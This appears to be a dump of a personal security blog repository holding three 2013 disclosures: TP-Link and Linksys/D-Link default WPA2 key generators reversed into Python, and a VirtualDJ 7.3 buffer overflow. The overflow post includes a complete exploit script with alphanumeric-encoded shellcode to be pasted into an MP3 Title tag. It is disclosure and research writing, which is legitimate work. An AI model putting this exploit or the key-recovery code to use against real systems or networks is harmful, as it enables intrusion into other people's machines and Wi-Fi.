pointer; 766 | font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace; 767 | font-size: 12px; 768 | line-height: 20px; 769 | min-width: 50px; 770 | padding-left: 10px; 771 | padding-right: 10px; 772 | text-align: right; 773 | user-select: none; 774 | vertical-align: top; 775 | white-space: nowrap; 776 | width: 1%; 777 | } 778 | 779 | .markdown-body .blob-num:hover { 780 | color: rgba(27,31,35,.6); 781 | } 782 | 783 | .markdown-body .blob-num:before { 784 | content: attr(data-line-number); 785 | } 786 | 787 | .markdown-body .blob-code { 788 | line-height: 20px; 789 | padding-left: 10px; 790 | padding-right: 10px; 791 | position: relative; 792 | vertical-align: top; 793 | } 794 | 795 | .markdown-body .blob-code-inner { 796 | color: #24292e; 797 | font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace; 798 | font-size: 12px; 799 | overflow: visible; 800 | white-space: pre; 801 | word-wrap: normal; 802 | } 803 | 804 | .markdown-body .pl-token.active, 805 | .markdown-body .pl-token:hover { 806 | background: #ffea7f; 807 | cursor: pointer; 808 | } 809 | 810 | .markdown-body kbd { 811 | background-color: #fafbfc; 812 | border: 1px solid #d1d5da; 813 | border-bottom-color: #c6cbd1; 814 | border-radius: 3px; 815 | box-shadow: inset 0 -1px 0 #c6cbd1; 816 | color: #444d56; 817 | display: inline-block; 818 | font: 11px SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace; 819 | line-height: 10px; 820 | padding: 3px 5px; 821 | vertical-align: middle; 822 | } 823 | 824 | .markdown-body :checked+.radio-label { 825 | border-color: #0366d6; 826 | position: relative; 827 | z-index: 1; 828 | } 829 | 830 | .markdown-body .tab-size[data-tab-size="1"] { 831 | -moz-tab-size: 1; 832 | tab-size: 1; 833 | } 834 | 835 | .markdown-body .tab-size[data-tab-size="2"] { 836 | -moz-tab-size: 2; 837 | tab-size: 2; 838 | } 839 | 840 | .markdown-body .tab-size[data-tab-size="3"] { 841 | -moz-tab-size: 3; 842 | tab-size: 3; 843 | } 844 | 845 | 
.markdown-body .tab-size[data-tab-size="4"] { 846 | -moz-tab-size: 4; 847 | tab-size: 4; 848 | } 849 | 850 | .markdown-body .tab-size[data-tab-size="5"] { 851 | -moz-tab-size: 5; 852 | tab-size: 5; 853 | } 854 | 855 | .markdown-body .tab-size[data-tab-size="6"] { 856 | -moz-tab-size: 6; 857 | tab-size: 6; 858 | } 859 | 860 | .markdown-body .tab-size[data-tab-size="7"] { 861 | -moz-tab-size: 7; 862 | tab-size: 7; 863 | } 864 | 865 | .markdown-body .tab-size[data-tab-size="8"] { 866 | -moz-tab-size: 8; 867 | tab-size: 8; 868 | } 869 | 870 | .markdown-body .tab-size[data-tab-size="9"] { 871 | -moz-tab-size: 9; 872 | tab-size: 9; 873 | } 874 | 875 | .markdown-body .tab-size[data-tab-size="10"] { 876 | -moz-tab-size: 10; 877 | tab-size: 10; 878 | } 879 | 880 | .markdown-body .tab-size[data-tab-size="11"] { 881 | -moz-tab-size: 11; 882 | tab-size: 11; 883 | } 884 | 885 | .markdown-body .tab-size[data-tab-size="12"] { 886 | -moz-tab-size: 12; 887 | tab-size: 12; 888 | } 889 | 890 | .markdown-body .task-list-item { 891 | list-style-type: none; 892 | } 893 | 894 | .markdown-body .task-list-item+.task-list-item { 895 | margin-top: 3px; 896 | } 897 | 898 | .markdown-body .task-list-item input { 899 | margin: 0 .2em .25em -1.6em; 900 | vertical-align: middle; 901 | } 902 | 903 | .markdown-body hr { 904 | border-bottom-color: #eee; 905 | } 906 | 907 | .markdown-body .pl-0 { 908 | padding-left: 0!important; 909 | } 910 | 911 | .markdown-body .pl-1 { 912 | padding-left: 4px!important; 913 | } 914 | 915 | .markdown-body .pl-2 { 916 | padding-left: 8px!important; 917 | } 918 | 919 | .markdown-body .pl-3 { 920 | padding-left: 16px!important; 921 | } 922 | 923 | .markdown-body .pl-4 { 924 | padding-left: 24px!important; 925 | } 926 | 927 | .markdown-body .pl-5 { 928 | padding-left: 32px!important; 929 | } 930 | 931 | .markdown-body .pl-6 { 932 | padding-left: 40px!important; 933 | } 934 | 935 | .markdown-body .pl-7 { 936 | padding-left: 48px!important; 937 | } 938 | 939 | 
.markdown-body .pl-8 { 940 | padding-left: 64px!important; 941 | } 942 | 943 | .markdown-body .pl-9 { 944 | padding-left: 80px!important; 945 | } 946 | 947 | .markdown-body .pl-10 { 948 | padding-left: 96px!important; 949 | } 950 | 951 | .markdown-body .pl-11 { 952 | padding-left: 112px!important; 953 | } 954 | 955 | .markdown-body .pl-12 { 956 | padding-left: 128px!important; 957 | } 958 | -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Blog 8 | 9 | 10 | 11 | 38 | 39 | 40 |
41 | 48 |

Blog

49 |
50 |
51 |
DateArticle
2019-02-16PS3/Cell Cryptomining: Wide arithmetic on SPUs
2018-04-18LLE vs HLE and their tradeoffs
2017-06-19GoogleCTF 2017 Reversing/Moon writeup
2016-10-12Solutions of xchg rax,rax
2016-09-07Fast lookups in JIT-compiled maps
2016-08-22Observations
2016-03-16PS3 GPU Full VRAM/IO access exploit
2013-04-20VirtualDJ Pro/Home 7.4: Buffer Overflow
2013-03-31WPA2 Key Generation Vulnerability: Linksys / D-Link
2013-03-30VirtualDJ Pro/Home 7.3: Buffer Overflow
2013-03-08WPA2 Key Generation Vulnerability: TP-Link
52 |
53 |
54 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /posts/2013-03-08-wpa2-vulnerability-tplink/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2013-03-08 4 | title: WPA2 Key Generation Vulnerability: TP-Link 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | These days I have been playing with my new WLAN router, a [TP-Link TD-W8970](http://www.tp-link.com/en/products/?categoryid=203), and I have found a particularly interesting issue that affects other TP-Link routers as well. These routers can be recognized by the ESSID key `TP-LINK_XXXXXX`. Their default key for WPA/WPA2 and WEP is 10 and 13 characters in length respectively, apparently in range `[0-9A-Z]` and randomly generated by the [EasySetupAssistant](http://www.tp-link.com/mx/support/download/?model=TD-W8970&version=V1#tbl_b). 9 | 10 | Based on this, the corresponding handshake of such a WPA/WPA2 key, bruteforced with typical GPU speeds of 20000 keys / second, would require 36^10 / 20000 seconds = 182807922003.1488 seconds = 5796.8011 years to be cracked. However, by disassembling the setup assistant, I realized this key is generated from a 32-bit seed by following a [linear congruential generator](http://en.wikipedia.org/wiki/Linear_congruential_generator) reducing our key set from 36^10 keys to 2^32 keys. The reversed generator is: 11 | 12 | ```python 13 | chars = "2345678923456789ABCDEFGHJKLMNPQRSTUVWXYZ" 14 | def gen(seed, length): #length=10 in WPA/WPA2, length=13 in WEP 15 | key = "" 16 | for i in range(length): 17 | seed = (seed * 0x343FD) + 0x269EC3 18 | key += chars[((seed >> 0x10) & 0x7FFF) % 0x28] 19 | return key 20 | ``` 21 | 22 | Furthermore, note how the for any `length` and 32-bit integer seed `k` following condition holds: `gen(k, length) == gen(k + 0x80000000, length)`. This reduces the keys to check to 2^31. 
At the previously mentioned computing speed, this implies finding such a key in 2^31 / 20000 seconds = 1.24 days. 23 | 24 | There is an additional issue affecting the seed generation that can help reducing the password dictionaries even more. These 32-bit seeds are not the result of a cryptographically secure [PRNG](https://en.wikipedia.org/wiki/Pseudorandom_number_generator). Instead they just represent a time difference, growing linearly at a rate of 1 every second as the system time passes. In Windows, the system time is obtained via `GetSystemTimeAsFileTime` from `Kernel32.dll`. The corresponding code to generate a seed at a given moment is: 25 | 26 | ```python 27 | import datetime 28 | 29 | def genSeed(currentTime): 30 | dt = currentTime - datetime.datetime(1601, 1, 1, 0, 0, 0) 31 | t = dt.days*864000000000 + dt.seconds*10000000 + dt.microseconds*10 32 | 33 | tA = (t / 2**32 + 0xFE624E21) 34 | tB = (t % 2**32 + 0x2AC18000) % (1 << 32) 35 | 36 | if tA >= (1 << 32): 37 | tA += 1 38 | tA %= (1 << 32) 39 | 40 | r = (tA % 0x989680) * (2**32) 41 | r = ((r + tB) / 0x989680) % (2**32) 42 | return r 43 | 44 | print genSeed(datetime.datetime.utcnow()) 45 | ``` 46 | 47 | If we can estimate the time interval in which the router was installed, we can reduce the total seeds from 2^31 to the seeds that could be generated in that specific time interval. For instance, if we are confident that such a router was installed during 2012, we would only have to check the keys corresponding to seeds between `0x4EFFA3AD` and `0x50E22700`: 48 | 49 | ```python 50 | genSeed(datetime.datetime(2012, 1, 1, 0, 0, 0)) # 0x4EFFA3AD 51 | genSeed(datetime.datetime(2013, 1, 1, 0, 0, 0)) # 0x50E22700 52 | ``` 53 | 54 | At the previously mentioned speed, we could potentially crack the password in a worst-case time of (0x50E22700 - 0x4EFFA3AD) / 20000 seconds = 26.35 minutes. 
55 | 56 | Since guessing the time in which the setup assistant configured the router can help us reduce the time required to find the key, we could improve our dictionary in the following ways: 57 | 58 | * Detect the WLAN router series and model, if possible, and compare it with a database of release dates in order to discard any seed corresponding to dates in which the router was not on the market. 59 | * Discard any seeds corresponding to *strange* hours. For instance, it is pretty unlikely someone sets up their router between 2 AM and 6 AM. 60 | 61 | ## Affected routers 62 | 63 | I have verified all setup assistants distributed with TP-Link routers and all *TL-WA*, *TL-WR*, *TL-WDR* series and *TD-WXXXX*, *TD-VGXXXX* models are affected. In about 10% of these routers I wasn't able to download the *EasySetupAssistant* through the link TP-Link provided, but I am confident enough that the results of same routers of the series can be extrapolated to them. 64 | 65 | The complete list of affected routers is: 66 | 67 | * TL-W8151N (V1, V3) 68 | * TL-WA730RE (V1, V2*) 69 | * TL-WA830RE (V1, V2*) 70 | * TL-WDR3500 71 | * TL-WDR3600 72 | * TL-WDR4300 73 | * TL-WR720N 74 | * TL-WR740N (V1, V2, V3, V4) 75 | * TL-WR741ND (V1, V2, V3*, V4) 76 | * TL-WR841N (V1*, V5, V7, V8) 77 | * TL-WR841ND (V3, V5, V7, V8*) 78 | * TL-WR842ND 79 | * TL-WR940N (V1, V2) 80 | * TL-WR941ND (V2, V3, V4, V5) 81 | * TL-WR1043N 82 | * TL-WR1043ND 83 | * TD-VG3511 (V1*) 84 | * TD-VG3631 85 | * TD-W8901N 86 | * TD-W8950ND 87 | * TD-W8951NB (V3*, V4, V5) 88 | * TD-W8951ND (V1, V3, V4, V5) 89 | * TD-W8960N (V1, V3, V4) 90 | * TD-W8961NB (V1, V2, V3*) 91 | * TD-W8961ND 92 | * TD-W8968 93 | * TD-W8970 94 | 95 | ## Resources 96 | 97 | * __TPLink-CheckKeys__: Check if your key is vulnerable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: http://www.mediafire.com/?oyrnt45sljlxa5a. 
98 | 99 | * __TPLink-GenSeeds__: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: http://www.mediafire.com/download.php?44l9629qq1dx2l8. 100 | 101 | * __TPLink-GenKeys__: Choose key type, the seed range which can be calculated with the previous tool. Information about dictionary to be generated will be given, accept to generate it in `./output.txt`. Download: http://www.mediafire.com/download.php?28z2fvdgpf22s68. 102 | 103 | ## Solutions 104 | 105 | * Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as `/dev/random` or `/dev/urandom` in Unix-like systems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do, the indices of the key character array are provided by `CryptGenRandom` in `Advapi32.dll`. 106 | * If for some reason you want to use seeds for generating keys: 107 | * Make them bigger than 32-bit. Just 2^32 keys are easy to check. 108 | * Obtain them from a cryptographically secure PRNG. 109 | * If you still want to obtain them from the system time, use finer-grained time units (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess. 110 | -------------------------------------------------------------------------------- /posts/2013-03-08-wpa2-vulnerability-tplink/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | WPA2 Key Generation Vulnerability: TP-Link 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

WPA2 Key Generation Vulnerability: TP-Link

65 |

66 | AuthorAlexandro Sanchez 69 | Date2013-03-08 72 |

73 |

These days I have been playing with my new WLAN router, a TP-Link TD-W8970, and I have found a particularly interesting issue that affects other TP-Link routers as well. These routers can be recognized by the ESSID key TP-LINK_XXXXXX. Their default key for WPA/WPA2 and WEP is 10 and 13 characters in length respectively, apparently in range [0-9A-Z] and randomly generated by the EasySetupAssistant.

74 |

Based on this, the corresponding handshake of such a WPA/WPA2 key, bruteforced with typical GPU speeds of 20000 keys / second, would require 36^10 / 20000 seconds = 182807922003.1488 seconds = 5796.8011 years to be cracked. However, by disassembling the setup assistant, I realized this key is generated from a 32-bit seed by following a linear congruential generator reducing our key set from 36^10 keys to 2^32 keys. The reversed generator is:

75 |
chars = "2345678923456789ABCDEFGHJKLMNPQRSTUVWXYZ"
 76 | def gen(seed, length): #length=10 in WPA/WPA2, length=13 in WEP 
 77 |     key = ""
 78 |     for i in range(length):
 79 |         seed = (seed * 0x343FD) + 0x269EC3
 80 |         key += chars[((seed >> 0x10) & 0x7FFF) % 0x28]
 81 |     return key
 82 | 
83 | 84 | 85 |

Furthermore, note how for any length and 32-bit integer seed k the following condition holds: gen(k, length) == gen(k + 0x80000000, length). This reduces the keys to check to 2^31. At the previously mentioned computing speed, this implies finding such a key in 2^31 / 20000 seconds = 1.24 days.

86 |

There is an additional issue affecting the seed generation that can help reducing the password dictionaries even more. These 32-bit seeds are not the result of a cryptographically secure PRNG. Instead they just represent a time difference, growing linearly at a rate of 1 every second as the system time passes. In Windows, the system time is obtained via GetSystemTimeAsFileTime from Kernel32.dll. The corresponding code to generate a seed at a given moment is:

87 |
import datetime
 88 | 
 89 | def genSeed(currentTime):
 90 |     dt = currentTime - datetime.datetime(1601, 1, 1, 0, 0, 0)
 91 |     t = dt.days*864000000000 + dt.seconds*10000000 + dt.microseconds*10
 92 | 
 93 |     tA = (t / 2**32 + 0xFE624E21)
 94 |     tB = (t % 2**32 + 0x2AC18000) % (1 << 32)
 95 | 
 96 |     if tA >= (1 << 32):
 97 |         tA += 1
 98 |         tA %= (1 << 32)
 99 | 
100 |     r = (tA % 0x989680) * (2**32)
101 |     r = ((r + tB) / 0x989680) % (2**32)
102 |     return r
103 | 
104 | print genSeed(datetime.datetime.utcnow())
105 | 
106 | 107 | 108 |

If we can estimate the time interval in which the router was installed, we can reduce the total seeds from 2^31 to the seeds that could be generated in that specific time interval. For instance, if we are confident that such a router was installed during 2012, we would only have to check the keys corresponding to seeds between 0x4EFFA3AD and 0x50E22700:

109 |
genSeed(datetime.datetime(2012, 1, 1, 0, 0, 0))  # 0x4EFFA3AD
110 | genSeed(datetime.datetime(2013, 1, 1, 0, 0, 0))  # 0x50E22700
111 | 
112 | 113 | 114 |

At the previously mentioned speed, we could potentially crack the password in a worst-case time of (0x50E22700 - 0x4EFFA3AD) / 20000 seconds = 26.35 minutes.

115 |

Since guessing the time in which the setup assistant configured the router can help us reduce the time required to find the key, we could improve our dictionary in the following ways:

116 | 120 |

Affected routers

121 |

I have verified all setup assistants distributed with TP-Link routers and all TL-WA, TL-WR, TL-WDR series and TD-WXXXX, TD-VGXXXX models are affected. In about 10% of these routers I wasn't able to download the EasySetupAssistant through the link TP-Link provided, but I am confident enough that the results of same routers of the series can be extrapolated to them.

122 |

The complete list of affected routers is:

123 | 152 |

Resources

153 | 164 |

Solutions

165 | 172 |
173 |
174 | 180 | 181 | 182 | -------------------------------------------------------------------------------- /posts/2013-03-30-virtualdj-73-buffer-overflow/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2013-03-30 4 | title: VirtualDJ Pro/Home 7.3: Buffer Overflow 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | I have found a buffer overflow vulnerability in [VirtualDJ Pro 7.3 and VirtualDJ Home 7.3](http://www.virtualdj.com/) and possibly previous versions of this software. When the user enters a folder, VirtualDJ tries to retrieve all information from the ID3 tags of MP3 files inside such as _Title_, _Album_, and _Artist_ and stores it in a buffer. After that, a second buffer of length 4096 is allocated in the stack and only the characters `[A-Z]` from the first buffer will be copied to it. According to the ID3 v2.x standard, these tags can have a length greater than 4096; therefore it is possible to produce a buffer overflow in this second buffer. At the time when the buffer overflow happens and the program reaches the `retn` instruction, the `edi` register points to the first buffer. 9 | 10 | We cannot assign the `eip` the address of the first buffer directly since it contains characters which are not in range A-Z. However if we take into account the previous information, we can do this indirectly: We write in the bytes 4100:4104 of the title `"FSFD"`. After the buffer overflow occurs we get `eip == 0x44465346 == "FSFD"`. At this address (inside _urlmon.dll_) we find a `call edi` instruction and so the bytes in the first buffer will be executed. Now we face another problem. VirtualDJ has inserted a 0xC3 byte (`retn`) before each non-printable ASCII character in the first buffer and we cannot execute the shellcode directly. We can solve this by pushing into the stack the bytes of the shellcode using only printable ASCII characters. 
Let me explain: 11 | 12 | Instead of pushing the bytes 0xB8, 0xFF, 0xEF, 0xFF (FFEFFFB8h) directly, we can do exactly the same using only printable ASCII characters by using the string `"%@@@@%????-R@D@-R@D@-R@D@-R?C?P"`: 13 | 14 | ```asm 15 | and eax, 40404040h ; 25 40 40 40 40 == "%@@@@" 16 | and eax, 3F3F3F3Fh ; 25 3F 3F 3F 3F == "%????" <– eax == 0 17 | sub eax, 40444052h ; 2D 40 44 40 52 == "-R@D@" 18 | sub eax, 40444052h ; 2D 40 44 40 52 == "-R@D@" 19 | sub eax, 40444052h ; 2D 40 44 40 52 == "-R@D@" 20 | sub eax, 3F433F52h ; 2D 3F 43 3F 52 == "-R?C?" <– eax == 0xFFEFFFB8 21 | push eax ; 50 == "P" 22 | ``` 23 | 24 | Once all the bytes of the shellcode are pushed into the stack (in inverse order) we use `push esp` (0x54) and `retn` (0xC3) to run the shellcode. Obviously, it does not matter if VirtualDJ pushes another 0xC3 byte before this one. 25 | 26 | This is a pretty serious vulnerability since VirtualDJ is considered the #1 software for mixing music with millions of downloads around the world. By exploiting this vulnerability it would be possible to quickly spread malware just by uploading a malicious MP3 file to a popular site. Even worse, this file might not be a suspicious file for antivirus software. Note how the 4096 padding bytes could be replaced by something apparently harmless such as the real title of the MP3 file followed by a lot of spaces. 
27 | 28 | ```python 29 | #Exploit: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability 30 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com 31 | #More info: http://www.youtube.com/watch?v=PJeaWqMJRm0 32 | 33 | import string 34 | 35 | def unicodeHex(c): 36 | c = hex(ord(c))[2:].upper() 37 | if len(c)==1: c = "0"+c 38 | return c+"00" 39 | 40 | def movEAX(s): 41 | #Arrays 42 | s = map(ord, list(s)) 43 | inst = [] 44 | target = [512, 512, 512, 512] 45 | carry = [0,-2,-2,-2] 46 | for i in range(4): 47 | if s[i] < 0x10: 48 | target[i] = 256 49 | if i < 3: 50 | carry[i+1] = -1 51 | diff = [target[b] - s[b] for b in range(4)] 52 | 53 | #Gen instructions 54 | for i in range(3): 55 | target = [target[b] - diff[b]/4 for b in range(4)] 56 | inst += [[diff[b]/4 for b in range(4)]] 57 | target = [target[b] - s[b] + carry[b] for b in range(4)] 58 | inst += [target] 59 | 60 | #Remove characters '[','\',']' 61 | for b in range(4): 62 | if ord("[") in [inst[i][b] for i in range(4)] or \ 63 | ord("\\") in [inst[i][b] for i in range(4)] or \ 64 | ord("]") in [inst[i][b] for i in range(4)]: 65 | for i in range(4): 66 | inst[i][b] = inst[i][b] + 5*((-1)**(i)) 67 | 68 | inst = ["\x2D" + "".join(map(chr, i)) for i in inst] 69 | return "".join(inst) 70 | 71 | #Shellcode: Run cmd.exe 72 | shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" 73 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" 74 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" 75 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45" 76 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3" 77 | retAddress = "\xED\x1E\x94\x7C" # JMP ESP ntdll.dll WinXP SP2 78 | shellcode += retAddress 79 | 80 | while len(shellcode) % 4 != 0: 81 | shellcode += '\x90' 82 | exploit = "" 83 | for i in range(0,len(shellcode),4)[::-1]: 84 | exploit += "\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F" #EAX = 0 85 | exploit += movEAX(shellcode[i:i+4]) #EAX = shellcode[i:i+4] 86 | exploit += 
"\x50" #PUSH EAX 87 | exploit += '\x54\xC3' #PUSH ESP; RETN 88 | 89 | c = 0 90 | for i in exploit: 91 | if i in string.ascii_letters: 92 | c += 1 93 | exploit += "A" * (4100 - c) 94 | exploit += "FSFD" 95 | 96 | print exploit 97 | #Paste the generated code in the tag 'Title' of the MP3 file. 98 | ``` 99 | 100 | You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=PJeaWqMJRm0. 101 | 102 | ## Log 103 | 104 | * __2012-11-29__: Bug discovered. VirtualDJ was emailed about this a few days later. 105 | * __2013-03-20__: Bug fixed with the release of VirtualDJ Pro/Home 7.4. 106 | * __2013-03-29__: Exploit published. 107 | -------------------------------------------------------------------------------- /posts/2013-03-30-virtualdj-73-buffer-overflow/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | VirtualDJ Pro/Home 7.3: Buffer Overflow 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

VirtualDJ Pro/Home 7.3: Buffer Overflow

65 |

66 | AuthorAlexandro Sanchez 69 | Date2013-03-30 72 |

73 |

I have found a buffer overflow vulnerability in VirtualDJ Pro 7.3 and VirtualDJ Home 7.3 and possibly previous versions of this software. When the user enters a folder, VirtualDJ tries to retrieve all information from the ID3 tags of MP3 files inside such as Title, Album, and Artist and stores it in a buffer. After that, a second buffer of length 4096 is allocated in the stack and only the characters [A-Z] from the first buffer will be copied to it. According to the ID3 v2.x standard, these tags can have a length greater than 4096; therefore it is possible to produce a buffer overflow in this second buffer. At the time when the buffer overflow happens and the program reaches the retn instruction, the edi register points to the first buffer.

74 |

We cannot assign eip the address of the first buffer directly, since it contains characters which are not in the range A-Z. However, if we take into account the previous information, we can do this indirectly: we write "FSFD" in bytes 4100:4104 of the title. After the buffer overflow occurs we get eip == 0x44465346 == "FSFD". At this address (inside urlmon.dll) we find a call edi instruction, so the bytes in the first buffer will be executed. Now we face another problem: VirtualDJ has inserted a 0xC3 byte (retn) before each non-printable ASCII character in the first buffer, so we cannot execute the shellcode directly. We can solve this by pushing the bytes of the shellcode onto the stack using only printable ASCII characters. Let me explain:

75 |

Instead of pushing the bytes 0xB8, 0xFF, 0xEF, 0xFF (FFEFFFB8h) directly, we can do exactly the same using only printable ASCII characters by using the string "%@@@@%????-R@D@-R@D@-R@D@-R?C?P":

76 |
and   eax, 40404040h   ; 25 40 40 40 40  == "%@@@@"
 77 | and   eax, 3F3F3F3Fh   ; 25 3F 3F 3F 3F  == "%????"  <– eax == 0
 78 | sub   eax, 40444052h   ; 2D 40 44 40 52  == "-R@D@"
 79 | sub   eax, 40444052h   ; 2D 40 44 40 52  == "-R@D@"
 80 | sub   eax, 40444052h   ; 2D 40 44 40 52  == "-R@D@"
 81 | sub   eax, 3F433F52h   ; 2D 3F 43 3F 52  == "-R?C?"  <– eax == 0xFFEFFFB8
 82 | push  eax              ; 50              == "P"
 83 | 
84 | 85 | 86 |

Once all the bytes of the shellcode are pushed onto the stack (in inverse order) we use push esp (0x54) and retn (0xC3) to run the shellcode. Obviously, it does not matter if VirtualDJ inserts another 0xC3 byte before this one.

87 |

This is a pretty serious vulnerability since VirtualDJ is considered the #1 software for mixing music, with millions of downloads around the world. By exploiting this vulnerability it would be possible to quickly spread malware just by uploading a malicious MP3 file to a popular site. Even worse, this file might not look suspicious to antivirus software. Note how the 4096 padding bytes could be replaced by something apparently harmless, such as the real title of the MP3 file followed by a lot of spaces.

88 |
#Exploit: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability 
 89 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com 
 90 | #More info: http://www.youtube.com/watch?v=PJeaWqMJRm0
 91 | 
 92 | import string
 93 | 
 94 | def unicodeHex(c):
 95 |     c = hex(ord(c))[2:].upper()
 96 |     if len(c)==1: c = "0"+c
 97 |     return c+"00"
 98 | 
 99 | def movEAX(s):
100 |     #Arrays 
101 |     s = map(ord, list(s))
102 |     inst = []
103 |     target = [512, 512, 512, 512]
104 |     carry  = [0,-2,-2,-2]
105 |     for i in range(4):
106 |         if s[i] < 0x10:
107 |             target[i] = 256
108 |             if i < 3:
109 |                 carry[i+1] = -1
110 |     diff = [target[b] - s[b] for b in range(4)]
111 | 
112 |     #Gen instructions 
113 |     for i in range(3):
114 |         target = [target[b] - diff[b]/4 for b in range(4)]
115 |         inst += [[diff[b]/4 for b in range(4)]]
116 |     target = [target[b] - s[b] + carry[b] for b in range(4)]
117 |     inst += [target]
118 | 
119 |     #Remove characters '[','\',']' 
120 |     for b in range(4):
121 |         if ord("[")  in [inst[i][b] for i in range(4)] or \
122 |            ord("\\") in [inst[i][b] for i in range(4)] or \
123 |            ord("]")  in [inst[i][b] for i in range(4)]:
124 |             for i in range(4):
125 |                 inst[i][b] = inst[i][b] + 5*((-1)**(i))
126 | 
127 |     inst  = ["\x2D" + "".join(map(chr, i)) for i in inst]
128 |     return "".join(inst)
129 | 
130 | #Shellcode: Run cmd.exe 
131 | shellcode  = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
132 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
133 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
134 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
135 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
136 | retAddress = "\xED\x1E\x94\x7C" # JMP ESP ntdll.dll WinXP SP2 
137 | shellcode += retAddress
138 | 
139 | while len(shellcode) % 4 != 0:
140 |     shellcode += '\x90'
141 | exploit = ""
142 | for i in range(0,len(shellcode),4)[::-1]:
143 |     exploit += "\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F"  #EAX = 0 
144 |     exploit += movEAX(shellcode[i:i+4])  #EAX = shellcode[i:i+4] 
145 |     exploit += "\x50"  #PUSH EAX 
146 | exploit += '\x54\xC3' #PUSH ESP; RETN 
147 | 
148 | c = 0
149 | for i in exploit:
150 |     if i in string.ascii_letters:
151 |         c += 1
152 | exploit +=  "A" * (4100 - c)
153 | exploit += "FSFD"
154 | 
155 | print exploit
156 | #Paste the generated code in the tag 'Title' of the MP3 file.
157 | 
158 | 159 | 160 |

You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=PJeaWqMJRm0.

161 |

Log

162 | 167 |
168 |
169 | 175 | 176 | 177 | -------------------------------------------------------------------------------- /posts/2013-03-31-wpa2-vulnerability-linksys-dlink/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2013-03-31 4 | title: WPA2 Key Generation Vulnerability: Linksys / D-Link 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | After finding the [TP-Link WPA2 Key Generation Vulnerability](../2013-03-08-wpa2-vulnerability-tplink/), I reverse-engineered assistants provided by other vendors. It turns out that some Linksys and D-Link routers use nearly identical algorithms to generate the default WPA2 keys as TP-Link routers use. For more information about this vulnerability and its consequences, please refer to the report linked above as redundant information will be omitted here. 9 | 10 | This time, the vulnerability affects the **Linksys EasyLink Advisor** and **D-Link Quick Setup Wizard** assistants, both based on *Network Magic*, software created by Pure Networks, a company belonging to Cisco/Linksys. Since Pure Networks actually sold their software to third parties, e.g. D-Link, there might be a chance of other affected assistants. 11 | 12 | The reversed generator is: 13 | 14 | ```python 15 | blacklist_windows = "1I2Z0O5SUV" 16 | blacklist_macosx = "B8DO0I1S5UVZ2" 17 | blacklist = blacklist_windows # Change me 18 | 19 | def gen(seed): 20 | key = "" 21 | for i in range(10): 22 | while True: 23 | seed = ((seed * 0x343FD) + 0x269EC3) % (2**32) 24 | edx = ((seed >> 0x10) & 0x7FFF) % 0x24 25 | if edx >= 0xA: 26 | edx += 0x37 27 | else: 28 | edx += 0x30 29 | if chr(edx) not in blacklist: 30 | key += chr(edx) 31 | break 32 | return key 33 | ``` 34 | 35 | The seeds used by this function are obtained in exactly the same way as in the TP-Link assistant. 
The only difference this time is that rather than pseudorandomly choosing characters from a *whitelist*, it adds random characters in range `[0-9A-Z]`, filtering out those found in a hardcoded *blacklist*, meant to prevent adding visually similar characters such as '`0`' and '`O`' to the key. 36 | 37 | As explained in the TP-Link vulnerability report, the low entropy can be exploited to bruteforce the key in a matter of minutes with a powerful GPU or hours with a CPU. 38 | 39 | 40 | ## Affected routers 41 | 42 | The complete list of affected Linksys routers is: 43 | 44 | * WAP610N (Blacklisted characters on Windows assistant: `"1I2Z0O5SUVB8"`) 45 | * WRT110 46 | * WRT120N 47 | * WRT160N (V1, V2, V3) 48 | * WRT160N-HP (V1*) 49 | * WRT160NL 50 | * WRT310N (V1, V2) 51 | * WRT320N 52 | * WRT400N 53 | * WRT54G2 54 | * WRT610N (V1*, V2) 55 | 56 | The complete list of affected D-Link routers is: 57 | 58 | * DGL-4100 59 | * DGL-4300 60 | * DIR-615 (not all revisions) 61 | * DIR-625 62 | * DIR-635 63 | * WBR-1310 64 | * WBR-1310 Rev. B 65 | * 